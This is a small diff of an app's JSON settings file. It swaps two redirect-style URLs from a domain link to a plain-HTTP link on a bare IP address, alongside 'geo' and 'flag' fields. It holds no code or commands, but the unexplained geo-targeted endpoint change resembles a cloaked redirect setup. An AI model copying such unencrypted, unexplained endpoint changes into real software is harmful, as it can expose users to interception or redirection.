--- a/AppSettings.json
+++ b/AppSettings.json
@@ -1,8 +1,8 @@
 {
   "array": [
     {
-      "url": "https://smartanimo.com/1PmncRLq",
-      "urlSecond": "https://smartanimo.com/1PmncRLq",
+      "url": "http://185.240.102.104/Gt4gGt",
+      "urlSecond": "http://185.240.102.104/Gt4gGt",
       "randomValue": "11",
       "geo":"RUS UK",
       "flag": "1"
